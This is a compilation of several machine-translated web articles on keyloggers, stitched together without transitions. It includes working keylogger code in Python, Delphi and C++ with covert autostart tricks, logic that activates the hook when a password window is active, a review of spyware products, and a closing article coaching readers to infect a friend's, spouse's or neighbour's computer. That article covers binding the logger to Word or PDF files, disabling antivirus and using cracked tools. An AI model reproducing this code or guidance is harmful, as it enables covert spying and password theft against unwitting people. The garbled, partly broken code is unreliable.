Information Security Laboratory.              Information Security Laboratory Keylogger how to write a program

Hello, Khabrovsk residents.

I decided to write a software keyboard logger in C++ using WinAPI. I can’t say that I was pursuing some kind of espionage goal when I wrote it; rather, I was getting acquainted with WinAPI hooks. Since it turned out not so bad, and there is no article on Habré about software loggers, I decided to write my own.

How is this done?

A keyboard hook was used to catch keypresses.

HHOOK WINAPI SetWindowsHookEx(_In_ int idHook, _In_ HOOKPROC lpfn, _In_ HINSTANCE hMod, _In_ DWORD dwThreadId);

In order to intercept all keyboard keystrokes, it is convenient to specify WH_KEYBOARD or WH_KEYBOARD_LL as the idHook parameter. The only difference is that WH_KEYBOARD_LL also intercepts keystrokes system keys(i.e. Alt or any key while holding Alt), so we will select it.

Lpfn is a pointer to a function that processes intercepted messages (in our case, keystrokes).
hMod is an application instance handle containing a processing function.
dwThreadId is the identifier of the thread whose messages we want to intercept. Need to install this parameter to 0 to intercept messages from all threads.

The return value is a handle to our hook, which will need to be freed with the UnhookWindowsHookEx function when exiting.
Looking at MSDN for help, we see a prototype of the function that processes messages from this hook.

LRESULT CALLBACK LowLevelKeyboardProc(_In_ int nCode, _In_ WPARAM wParam, _In_ LPARAM lParam);

nCode must be equal to HC_ACTION, otherwise the message is given to another process.
wParam is one of the following values: WM_KEYDOWN, WM_KEYUP, WM_SYSKEYDOWN, or WM_SYSKEYUP.
lParam is a pointer to the KBDLLHOOKSTRUCT structure, in the fields of which we are interested only in 2 parameters: vkCode (virtual code) and scanCode of the pressed key.
This function must return the value of the CallNextHookEx function, otherwise the next hook that processes the event may receive incorrect message parameters.
Every time a key is pressed, our program will intercept this event and process it with our LowLevelKeyboardProc procedure.

In order to retranslate the virtual and scan code of a key into symbolic form, we need the ToAsciiEx function.

Int WINAPI ToAsciiEx(_In_ UINT uVirtKey, _In_ UINT uScanCode, _In_opt_ const BYTE *lpKeyState, _Out_ LPWORD lpChar, _In_ UINT uFlags, _In_opt_ HKL dwhkl);

The first 2 parameters are the virtual and scan codes of the key, respectively.
lpKeyState — keyboard state, checks which keys are pressed/active.
lpChar is a pointer to a double word into which the function will write the symbolic representation of the key.
uFlags is a parameter indicating menu activity.
dwhkl — keyboard layout identifier.
The return value is the number of characters written to the lpChar buffer. We are interested in the case when 1 character is written.
Basically, these are the 3 main functions required for the simplest keyboard logger.

A little about the program

The program compiles without RTL in Visual Studio 2013. Thus, we get a small volume executable file and the impossibility of building in the debug version. The data is written to a log file in the same directory where the .exe file is located. For convenience, the logger creates a new file each time it records, records the time of key presses, the name of the window in which the characters were entered, and stops by pressing LSHIFT+RSHIFT. This sniffer is not adapted for a full keyboard; some service keys, such as F13 or NUM_LOCK, can be written as . I think those who are at least a little familiar with C/C++ can easily add them. Moreover, you can completely change the code to suit you.

Hello, QUAZAR is here again. Today I will show you how to create a simple keylogger in Python. Of course this keylogger cannot compete with such giants as, but despite this it can find its use.

What is a keylogger?

You can read in detail about what a keylogger is and about the types of keyloggers in the article ““. To find additional materials on the topic, use the site search, which is located in the upper right corner. Just enter the word "keylogger" or "keylogger".

Simple keylogger in Python

To create a keylogger we need:

• Operating system: Windows or MacOs (any Linux can also be used, but I haven't tried it personally)
• Python installed on the target machine, as well as special libraries.

This material is for informational purposes only. The information presented in this article is provided for informational purposes only. Neither the editors of the website www.site nor the author of the publication bear any responsibility for any harm caused by the material in this article.

Creating a simple keylogger in Python

First you need to download and install Python.

Simple keylogger in Python

After installing Python, you need to install the "pyHook" and "pywin32" modules. On this site you will find 32 and 64 bit versions for Windows and other OSes. Download "PYhook" and "pyWin32" according to your installed version of Python and Windows (32bit or 64bit).

Keylogger in Python. PYhook Keylogger module in Python. pyWin32 module

Once downloaded, install and open IDLE (Python GUI) menu from the Start menu.

Simple keylogger in Python

Go to the “File” menu and click on the “ New File" Then paste the keylogger code:

#Name: QUAZAR
#Website: www.site
import pyHook, pythoncom, sys, logging
file_log = "C:keyloggerlog.txt"
def OnKeyboardEvent(event):
logging.basicConfig(filename=file_log, level=logging.DEBUG, format="%(message)s")
chr(event.Ascii)
logging.log(10,chr(event.Ascii))
return True
hooks_manager = pyHook.HookManager()
hooks_manager.KeyDown = OnKeyboardEvent
hooks_manager.HookKeyboard()
pythoncom.PumpMessages()

And save it by calling the file Keylogger.pyw. Just don't save the file in the root directory C: where you need administrator rights to copy and delete files. Create new folder on the C: drive or some other location where you don't need admin rights to copy files and save Keylogger.pyw there.

You can select any location as the output report file “file_log = “C:keyloggerlog.txt”, but preferably, of course, some hidden location on your hard drive. In this example, I will save the report file to disk in the root directory C:. After all, I have nothing to hide.

Automatic launch of a keylogger in Python

The keylogger is ready. Now we need to make sure that the keylogger runs hidden from the user and automatically with loading Windows. This can be implemented in different ways. Let's try to do it using a bat file by linking the launch of the keylogger to some program or by registering it in startup.

First, create a bat file. Copy and paste the following code into Notepad:

::Name: QUAZAR
::Website: www.site
@echo off
start "" "C:keyloggerkeylogger.pyw"
start "" "C:Program FilesOperalauncher.exe"

In the first line you need to enter the path to the keylogger.pyw file (in my case “C:keylogger.pyw”). In the second line, you must enter the path to the program that the user usually uses (in my case, the Opera browser).

After editing, save the file in the .bat extension (in my case logger.bat) in some hidden place on the computer (in my case in “C:keylogger.bat”).

Now go to the desktop and select a shortcut for a frequently used program (in my case, this is the Opera browser). Right click the mouse to call context menu and go to the shortcut properties. In the “Object” field, enter the path to the keylogger bat file “C:keyloggerlogger.bat”.

After making changes, the shortcut icon will also change. But this can be easily solved on the properties tab (see screenshot above).

Various spyware are necessary in conditions where many people have access to one computer.

In these conditions, the user may want to know which sites were visited from his computer (for example, by children), whether theft occurred from credit cards using saved passwords, etc. to clarify these issues you will need.

Our review will allow you to make the best choice.

Features of choice

What exactly is a keylogger? This is a program that, strictly speaking, is not directly related to the keyboard.

It is installed in the computer's memory and acts on. Often, signs of its activity are not visible on the computer unless you specifically look for them.

Such a program interacts indirectly with the keyboard, that is, it works with a program on the PC that converts the signals received by the processor as a result of pressing buttons into text when printing.

That is, the action of such software is aimed at collecting information entered through the keyboard.

There are such utilities different types– with the help of some you can view all the text typed from the keyboard, with others – only what was typed in the browser or in any selected application.

Some programs provide the ability to configure such indicators, others do not.

They also differ from each other in the degree of secrecy. For example, the activity of some is obvious, a shortcut remains on the Desktop, etc., such programs are suitable for monitoring the activities of, for example, children.

Traces of the presence and activity of others are not noticeable at all - they act hidden and are suitable for installation on someone else’s computer, when the fact of installation needs to be hidden from a third-party user.

Given such diversity, choosing the most suitable software can be quite difficult.

IN this material The TOP of the best programs that can be used for this purpose is presented. It is easier to choose the right one among them.

Specifications

To simplify the selection process software The table below shows the main comparative characteristics all programs included in the TOP.

Name	License type	Type of information collected	Functional	Design
SC-KeyLog	For free	All	Wide	Simplified
WideStep Handy Keylogger	Free/Paid	All	Wide	Improved
Actual Spy	Paid	All	Very wide	Standard
EliteKeylogger	Paid	All	Wide	Standard
The Rat!	Free/Paid	Less than previous	Quite wide	Unaesthetic
SPYGO	For free	Depending on version	Depending on version	Standard Windows appearance
Ardamax Keylogger 2.9	For free	From the keyboard	Narrowed	Simplified
NS Keylogger Personal Monitor 3.8	For free	All	Narrowed	Simplified
KGB Spy	Paid	From the keyboard + open programs	Narrow	Simple
Golden Keylogger 1.32	For free	From the keyboard	Very narrow	Simple

Based on the characteristics from this table, it is easy to choose the program that best suits your specific requirements.

These utilities are described in more detail below.

SC-KeyLog

This is a voluminous and functional spy program that is distributed free of charge.

In addition to specifically tracking information entered from the keyboard, it is also able to collect addresses of visited sites, passwords, open windows in the browser.

Provides complete information about all actions performed on the computer. In this case, the generated file can be viewed remotely from another device.

• Opportunity remote access to a file from another device;
• No traces of program activity on the computer with the correct settings;
• Variety of collected data – information about almost all actions on the PC can be accessed.

• Saves passwords only up to NT0;
• Too simple menu and unaesthetic design;
• A rather inconvenient format for displaying the result.

What do users who actively use this software say? “Absolutely invisible to the user”, “Data arrives regularly by email.”

WideStep Handy Keylogger

This application is distributed free of charge. The full paid version costs $35.

Quite an interesting and functional program that is worth the money if you are willing to pay it.

Distinctive feature– the ability to send recorded data at a specified frequency. Otherwise it works fine, often more stable than other programs on this list.

• Collection of various types of information;
• Complete invisibility of work on the user’s computer;
• Simple interface and controls.

• The design is better than the previous program, but still not great;
• The result display format is inconvenient;
• The paid version is quite expensive.

Users' opinions about this software are as follows: “Convenient, simple and functional program. Quite invisible when working.”

Actual Spy

It is functional and sophisticated paid program costing 600 rubles. However, it has a demo version that is free.

Feature of this software– ability in a given period of time.

This helps solve the problem of entering a graphic password/key, which Lately began to spread widely.

• Many types of information collected plus the ability to take screenshots from the screen during a specified period;
• A large number of others additional functions and features;
• Records not only actions, but also the time they were performed;
• Encrypts the generated log.

• The duration of work (collection of information) in the free demo version is 40 minutes;
• Paid distribution, although a more or less reasonable price;
• The weight of the program is quite large.

User reviews about this application are: “The program is excellent. Well done programmers!”

EliteKeylogger

Paid program with a fairly high price– 69 dollars. Operates on a PC completely unnoticed in mode low level, therefore almost completely undetectable.

Interesting and convenient feature – automatic start software, occurring simultaneously with the launch of the system itself.

It is difficult to detect or not detected at all even by special anti-keyloggers.

• Completely hidden action and difficult to detect;
• Low-level driver-type operating format and automatic startup when the system boots;
• It also tracks the presses of not only the main, but also the service keys on the keyboard.

• A rather complex system for installing the program on a PC;
• High cost of the program, but Russian Internet you can find an old hacked version;
• Quite a complex system individual settings program, which, however, justifies itself.

What do users say about this software? " Good program", "A little short of Jetlogger."

The Rat!

Quite common and popular functional utility with a paid license.

However, for private use, a free demo version is provided for a limited period.

The program is very simple– any advanced user can write the same. However, it is completely undetectable by antiviruses and special programs, detecting such software.

• Simplicity, functionality and high stability;
• Minimum file weight and space occupied by it on the computer;
• Quite a lot of settings.

• A rather unpleasant design, made in black, white and red;
• The functionality is somewhat narrower than in the programs described before;
• Inconvenient viewing of the log and generally inconvenient interface and use.

Users say the following about this program: “It works stably, but is a bit simple,” “The program is good, it allows you to collect data unnoticed.”

SPYGO

This is a fundamentally new keylogger, designed to work on and developed by a Russian programmer.

About writing keyloggers
has been told many times already, but all of them
have one big drawback - as a rule,
very limited knowledge required
information, rather than writing everything to a log file,
what the user writes on the keyboard is unlikely for you
will give a lot of food for thought logs
pressing buttons when playing CS 😉

It follows that the spy must be
advanced, and not stupidly write everything that
they give him :) Even name such a program
a spy doesn't turn his tongue - it's almost
electronic agent 007:-))) Ways to
so that the program writes to the log of interest
We have a lot of material. Simplest -
control active windows, i.e. in which
V this moment the buttons are choking 🙂 How are you,
I think, you know, spies usually consist of
executable file and DLL. This is due to the fact
what to intercept messages to window
you need to create a new PROCESS, and most
A convenient way to do this is to use a dll.
Therefore, in order to activate
actually the logger itself, you will need it in the right one
moment to load the DLL, and when the window is active
changes to something else - unload it from memory.

Let's look at the functions of working with DLLs in the Visual language
C++. The dll is being loaded into memory
function hINSTAGE=LoadLibrary("name.dll"), where hINSTAGE -
like a descriptor of a DLL loaded into memory,
name.dll - library name. To unload it,
there is a function FreeLibrary(hINSTAGE);

Now about how we can get the things we need
applications. For example, we know that the user
reads mail through the website www.mail.ru, then you can
configure the agent so that it intercepts
keystrokes when the user goes to this
website. (It should be remembered that in some
There are no keyboard spy apps at all
can work, for example, in the address bar
Internet Explorer"a - this leads to "crash
completion of programs" - what else are you from
Windows wanted :))) For this method it is quite
reading passwords from the dialer is also suitable
- if the user suffers from paranoia and every time
enters login and pass manually :) Or you really
it’s interesting to know what he writes in Outlook or
in a notepad. Here is the part of the code that does
comparison of window titles with the ones we need.

HINSTAGE hINSTAGE;

while (1)
{
//Start the loop.

int sl,ll;
ll=1;
sl=2;
//variables for
counterA.
char st;
HWND hw;
//Let's go with the simplest one
by - comparing strings character by character:
the resulting window title and with the one we need
line.

while (ll!=sl)
{

hw=GetForegroundWindow();
GetWindowText(hw,st,128); // read

char stt="_Here we write the title of the desired
windows for us_№1";

sl=strlen(stt);
ll=0;
while (stt==st)
//compare
line by character
//it’s more convenient to do this from the position that will be
check whether the required one is included
//we can use the string as part of another string, you can
make something like //a wide filter.
{
ll++;
}

if (ll==sl) ( //if strings
match until the end of the 1st line -
halt; //interrupt the process
}
// and so on - if
you need to check for the presence of multiple windows.
char stt="_Here we write the title of the desired
windows for us_No. 2";
sl=strlen(stt);
ll=0;
while (stt==st)
{
ll++;
}

if (ll==sl) (
halt; //interrupt the process
}

Instead of sequential checking, you can
make parallel when compared in
one cycle of row elements, if at least one
matches - then the DLL spy is activated.

hINSTAGE=LoadLibrary("key1.dll");

Now we need to check all the time
whether this window remains active.

while (ll==sl) //Bye
the lines match - we spin in place
{
hw=GetForegroundWindow();
GetWindowText(hw,st,128);// read
currently active window.
ll=0;
while (stt==st)
{
ll++;
}
}

Exit from the cycle indicates that the active
the window has changed, so next we unload the “spyware”
library and the cycle starts from the beginning - i.e.
the program again waits for one of the
the required windows.

FreeLibrary(hINSTAGE);

However, the above method also has
Disadvantages - needs to be checked every time
from a whole list of windows is the one you need?
us active at the moment. That's why
you can use a different algorithm - do not check
window title, and look if in this
window elements of type EditBox. As a rule,
passwords are written there :) For this there will be
look at the elements of this window - and if
among them there is Edit - then we load the DLL.

char p2,p3; //arrays
characters for window titles.

Again, we check all windows in a loop:

while (p3!="Edit") //Bye
We didn’t find a window with an editbox - run a loop
{

hw=GetForegroundWindow();

HWND hwnd_child; //variable
window element

hwnd_child = GetWindow(hw,GW_CHILD);
GetClassName(hwnd_child,p3,128);
if (p3!="Edit")
//if the first one is
found window elements - not EditBox - then
looking further
{
while (hwnd_child!=0)
{
hwnd_child = GetWindow(hwnd_child, GW_HWNDNEXT);

GetClassName(hwnd_child,p3,128);
if (p3=="Edit")
{
halt;
}
}
}
}

Now about the spy DLL itself.
It is better to write it in Delphi, because this
the mature descendant of Pascal does not have such
perverted "Sipipish" habit
nitpicking about data types. To create
select the library File-New-Direct Link Library - and
the template for the DLL is ready. And here is the code itself:

library key1;
usesWindows;

var
KHook: HHOOK; //variable for
"traps"

function KProc(Code: integer; wParam: Word; lParam: LongInt): LongInt; stdcall;
const
KState: integer = 1073741824; //code
"key pressed"

var
Simv: ShortString;
KL: array of Char; //For
checking keyboard layout
FStruct: TOFSTRUCT;
F:TextFile;//variable
file for recording the log.

begin

// weed out unnecessary ones
messages
if (lParam and KState)<>0 then
begin

Exit;
end;

AssignFile(F, "keylog.txt");

// trying to open
file "keylog.txt":
if OpenFile(PChar("keylog.txt"), FStruct, OF_EXIST) = HFILE_ERROR then
begin
ReWrite(F);// if the file is not
created - we create.
end
elseAppend(F);
//if there is, write to
end.

Simv:=chr(0); //reset to zero
variable of the symbol read from the keyboard.

// analyze the code
key pressed
case wParam of
// numbers
48..57: Simv:=Chr(wParam);
96: Simv:="0";
97: Simv:="1";
...
104: Simv:="8";
105: Simv:="9";
189,109: Simv:="-";
110: Simv:=".";
111: Simv:="/";
end;

GetKeyboardLayoutName(KL); //
checking the layout
if KL = "00000409" then // If
Latin:
begin
case wParam of
219: Simv:="[";
221: Simv:="]";
186: Simv:=";";
222: Simv:=""";
188: Simv:=",";
190: Simv:=".";
191: Simv:="/";
65..90: Simv:=Chr(wParam);
end;
end;
end;
if KL = "00000419" then// If
Russian
begin
case wParam of
219: Simv:="X";
221: Simv:="Ъ";
186: Simv:="F";
222: Simv:="E";
188: Simv:="B";
190: Simv:="Yu";
191: Simv:=".";
65: Simv:="F";
...
87: Simv:="C";
88: Simv:="H";
89: Simv:="N";
90: Simv:="I";
end;

//if the symbol is not empty (i.e.
if an alphanumeric key was pressed)
//then write it to a file
if Simv<>"" then
Write(F, Simv);
//close the file
CloseFile(F);

// send the message
other traps in the system
Result:=CallNextHookEx(KHook, code, wParam, lParam);
end;

begin
//Set trap
to intercept keyboard messages.
KHook:=SetWindowsHookEx(WH_KEYBOARD, @KProc, HInstance, 0);

This program can also be simplified in
depending on the application - if
let's say you only need to count once
password from the dialer - then you can set
checking the windows until we need it, and when it is
will become active - load the library
key1.dll, wait certain time, behind
which the user will have time to type these characters into
keyboard and then unload the library and
end the program. Something like this :)

hINSTAGE=LoadLibrary("key1.dll");
Sleep(10000);
//wait 10 seconds, for this
time the user will type the password.
//time can be increased depending
depending on the user's level of inhibition
// and his typing speed on the keyboard :)
FreeLibrary(hINSTAGE);

PS: All of the above material was given
exclusively with demo and
general educational goals, the author set
I have a task to demonstrate
program algorithm of the "upgraded" type
keylogger" and all
responsibility for the use of this
material falls on you (overwhelming
burden 🙂) The implementation of the code contains
minor inaccuracies that do not actually harm
algorithm - try to find them yourself)).

PSS: Of course, a keylogger can not only
perform its main function -
actually write button presses to the log, but also
change the values ​​of the keys pressed according to your needs
taste - but how to do it and what it’s for
may simply be vital - in
next time :)

Who among us hasn’t wanted to feel like a cool hacker at least once and break at least something? :) Even if not, then let’s talk about how great it would be to get a password from your mail/social network. the network of a friend, wife/husband, roommate thought at least once by everyone. :) Yes, and you have to start somewhere, after all! A significant part of attacks (hacking) involves infecting the victim’s computer with so-called keyloggers (spyware).

So, in today’s article we’ll talk about what are free programs to monitor computers on windows based , where you can download their full versions, how to infect a victim’s computer with them, and what are the features of their use.

But first, a little introduction.

What are keyloggers and why are they needed?

I think you yourself have guessed what it is. As a rule, they are a kind of program that is hidden (although this is not always the case) installed on the victim’s computer, after which it records absolutely all keystrokes on this node. Moreover, in addition to the clicks themselves, the following is usually recorded: the date and time of the click (action) and the program in which these actions were performed (browser, including the website address (hurray, we immediately see what the passwords are for!); local application; system services (including Windows login passwords), etc.).

From here one of the problems is immediately visible: I got access to my neighbor’s computer for a couple of minutes and I want to get her password from VK! I installed the miracle program and returned the computer. How can I look up passwords later? Looking for a way to take the computer from her again? The good news is: usually not. Most keyloggers are capable of not only storing the entire accumulated database of actions locally, but also sending it remotely. There are many options for sending logs:

• A fixed email (there may be several) is the most convenient option;
• FTP server (who has it);
• SMB server (exotic, and not very convenient).
• A fixed flash drive (you insert it into the USB port of the victim’s computer, and all logs are copied there automatically in invisible mode!).

Why is all this needed? I think the answer is obvious. In addition to the banal stealing of passwords, some keyloggers can do a number of other nice things:

• Logging correspondence in specified social networks. networks or instant messengers (for example, Skype).
• Taking screenshots of the screen.
• View/capture webcam data (which can be very interesting).

How to use keyloggers?

And this is a difficult question. You need to understand that just finding a convenient, functional, good keylogger is not enough.

So, what is needed for a spy program to work successfully?:

• Administrator access to a remote computer.
  Why is this not at all necessary? physical access. You can easily access it via RDP (Remote Desktop Service); TeamViewer; AmmyAdmin, etc.
  As a rule, the greatest difficulties are associated with this point. However, I recently wrote an article about how to get administrator rights in Windows.
• Anonymous e-mail / ftp (by which you will not be identified).
  Of course, if you are breaking Aunt Shura for your neighbor, this point can be safely omitted. As is the case if you always have the victim’s computer at hand (ala, find out your brother/sister’s passwords).
• Lack of working antiviruses / internal systems Windows protection.
  Most public keyloggers (which will be discussed below) are known to the vast majority of antivirus software (although there are logger viruses that are built into the OS kernel or system driver, and antiviruses can no longer detect or destroy them, even if they have detected them). Due to the above, anti-virus software, if any, will have to be mercilessly destroyed. In addition to antiviruses, systems like Windows Defender(these first appeared in Windows 7 onwards). They are catching suspicious activity software running on a computer. You can easily find information on how to get rid of them on Google.

These, perhaps, are all the necessary and sufficient conditions for your success in the field of stealing other people’s passwords / correspondence / photos or whatever else you want to encroach on.

What types of spyware are there and where can I download them?

So, let's begin the review of the main keyloggers that I used in my daily practice with links to free download their full versions(i.e. all versions are the latest at the moment (for which it is possible to find a cure) and with already working and tested cracks).

0. The Rat!

Ratings (out of 10):

• Stealth: 10
• Convenience/usability: 9
• Functionality: 8

It's just a bomb, not a keylogger! In working condition it takes 15-20 KB. Why be surprised: it is written entirely in assembly language (veteran programmers shed tears) and written mostly by enthusiastic hackers, due to which the level of its secrecy is simply amazing: it works at the OS kernel level!

In addition, the package includes FileConnector - a mini-program that allows you to connect this keylogger with absolutely any program. As a result, you get a new exe of almost the same size, and when launched, it works exactly like the program with which you glued it together! But after the first launch, your keylogger will be automatically installed in invisible mode with the parameters for sending logs that you have previously specified. Convenient, isn't it?

An excellent opportunity for social engineering (bring a game file/presentation to a friend on a flash drive, or even just a Word document (I’ll tell you how to create an exe file that launches a specific word/excel file in one of my next articles), launch, everything is fine and wonderful, but the friend is already invisibly infected!). Or you just send this file to a friend by mail (it’s better to download a link to it, since modern mail servers prohibit sending exe files). Of course, there is still a risk from antivirus software during installation (but it will not exist after installation).

By the way, with the help of some other techniques you can glue together any hidden installation distribution (these are found in The Rat! and Elite keylogger) not only with exe files (which still raise suspicion among even more or less advanced users), but also with ordinary word / excel and even pdf files! No one will ever think anything about a simple pdf, but that’s not the case! :) How this is done is the topic of a whole separate article. Those who are especially zealous can write me questions through the feedback form. ;)

Overall, The Rat! can be described for a very long time and a lot. This was done much better than me. There is also a download link there.

1. Elite keylogger

Ratings (out of 10):

• Stealth: 10
• Convenience/usability: 9
• Functionality: 8

Perhaps one of the best keyloggers ever created. Among its capabilities, in addition to standard set(interception of all clicks in the context of applications / windows / sites), includes interception of instant messenger messages, pictures from a webcam, and also - which is VERY important! - interception of WinLogon service passwords. In other words, it intercepts Windows login passwords (including domain ones!). This became possible thanks to its work at the system driver level and launch even at the OS boot stage. Due to this same feature, this program remains completely invisible to both Kasperosky and all other anti-malware software. Frankly, I have not met a single keylogger capable of this.

However, you shouldn’t delude yourself too much. The installer itself is recognized by antiviruses very easily and to install it you will need administrator rights and disabling all antivirus services. After installation, everything will work perfectly in any case.

In addition, the described feature (working at the OS kernel level) introduces requirements for the OS version on which the keyloggers will work. Version 5-5.3 (links to which are given below) supports everything up to Windows 7, inclusive. Win 8/10 as well windows family server (2003 / 2008 / 2012) are no longer supported. There is version 6, which functions perfectly, incl. on win 8 and 10, however, it is currently not possible to find a cracked version. It will probably appear in the future. In the meantime, you can download Elite keylogger 5.3 from the link above.

No mode networking, therefore, it is not suitable for use by employers (to monitor the computers of their employees) or an entire group of people.

An important point is the ability to create an installation distribution with predefined settings (for example, with a specified email address where logs will need to be sent). At the same time, at the end you get a distribution kit that, when launched, does not display absolutely any warnings or windows, and after installation it can even destroy itself (if you check the appropriate option).

Several screenshots of version 5 (to show how beautiful and convenient everything is):

2. All-in-one keylogger.

Ratings (out of 10):

• Stealth: 3
• Convenience/usability: 9
• Functionality: 8

It is also a very, very convenient thing. The functionality is quite at the level of Elite keylogger. Things are worse with secrecy. Winlogon passwords are no longer intercepted, it is not a driver, and is not built into the kernel. However, it is installed in system and hidden AppData directories, which are not so easy to reach to unauthorized users(not to those on whose behalf it was installed). Nevertheless, antiviruses sooner or later successfully do this, which makes this thing not particularly reliable and safe when used, for example, at work to spy on your own superiors. ;) Gluing it to something or encrypting the code to hide it from antiviruses will not work.

Works on any version of Win OS (which is nice and practical).

As for the rest, everything is fine: it logs everything (except Windows login passwords), sends it anywhere (including e-mail, ftp, fixed flash drive). In terms of convenience, everything is also excellent.

3. Spytech SpyAgent.

Ratings (out of 10):

• Stealth: 4
• Convenience/usability: 8
• Functionality: 10

Also a good keylogger, although with dubious secrecy. Supported OS versions are also all possible. The functionality is similar to previous options. Eat interesting feature self-destruction after a specified period of time (or upon reaching a predetermined date).

In addition, it is possible to record video from a webcam and sound from a microphone, which can also be very popular and which the previous two representatives do not have.

There is a network mode of operation, which is convenient for monitoring an entire network of computers. By the way, StaffCop has it (it is not included in the review due to its uselessness for one user - an individual). Perhaps this program is ideal for employers to spy on their employees (although the leaders in this field are unconditionally StaffCop and LanAgent - if you are a legal entity, be sure to look in their direction). Or to keep track of your offspring who love to sit and watch “adult sites”. Those. where what is needed is not concealment, but convenience (including a bunch of beautiful log reports, etc.) and functionality for blocking specified sites/programs (SpyAgent also has it).

4. Spyrix Personal monitor.

Ratings (out of 10):

• Stealth: 4
• Convenience/usability: 6
• Functionality: 10

The functionality is at the level of the previous candidate, but the same problems with secrecy. In addition, the functionality includes interesting thing: Copy files from USB drives inserted into your computer, as well as remote viewing logs through a web account on the Spyrix website (but we are going to download a cracked version, so it will not work for us).

5. Spyrix Personal monitor.

Ratings (out of 10):

• Stealth: 3
• Convenience/usability: 6
• Functionality: 8

I won’t describe it in detail, because... this instance does not have anything that one of the previous spies did not have, however, someone may like this keylogger (at least for its interface).

What do we end up with?

The issue of using a keylogger is more ethical than technical, and it greatly depends on your goals.

If you are an employer who wants to control his employees, feel free to set up StaffCop, collect written permission from all employees for such actions (otherwise you may be seriously charged for such things) and the job is in the bag. Although I personally know more effective ways increasing the performance of its employees.

If you are a novice IT specialist who just wants to experience what it’s like to break someone - and how this thing works in general, then arm yourself with social engineering methods and conduct tests on your friends, using any of the examples given. However, remember: the detection of such activity by victims does not contribute to friendship and longevity. ;) And you definitely shouldn’t test this at your work. Mark my words: I have experience with this. ;)

If your goal is to spy on your friend, husband, neighbor, or maybe you even do it regularly and for money, think carefully about whether it’s worth it. After all, sooner or later they may attract. And it’s not worth it: “rummaging through someone else’s dirty laundry is not a pleasant pleasure.” If you still need to (or maybe you work in the field of investigating computer crimes and such tasks are part of your professional responsibilities), then there are only two options: The Rat! and Elite Keylogger. In the mode of hidden installation distributions, glued with word / excel / pdf. And it’s better, if possible, encrypted with a fresh cryptor. Only in this case can we guarantee safer activities and real success.

But in any case, it is worth remembering that the competent use of keyloggers is only one small link in achieving the goal (including even a simple attack). You don’t always have admin rights, you don’t always have physical access, and not all users will open, read, and even more so download your attachments/links (hello social engineering), the antivirus won’t always be disabled/your keylogger/cryptor won’t always be unknown to them . All these and many untold problems can be solved, but their solution is the topic of a whole series of separate articles.

In a word, you have just begun to plunge into a complex, dangerous, but insanely interesting world information security. :)

Sincerely,Lysyak A.S.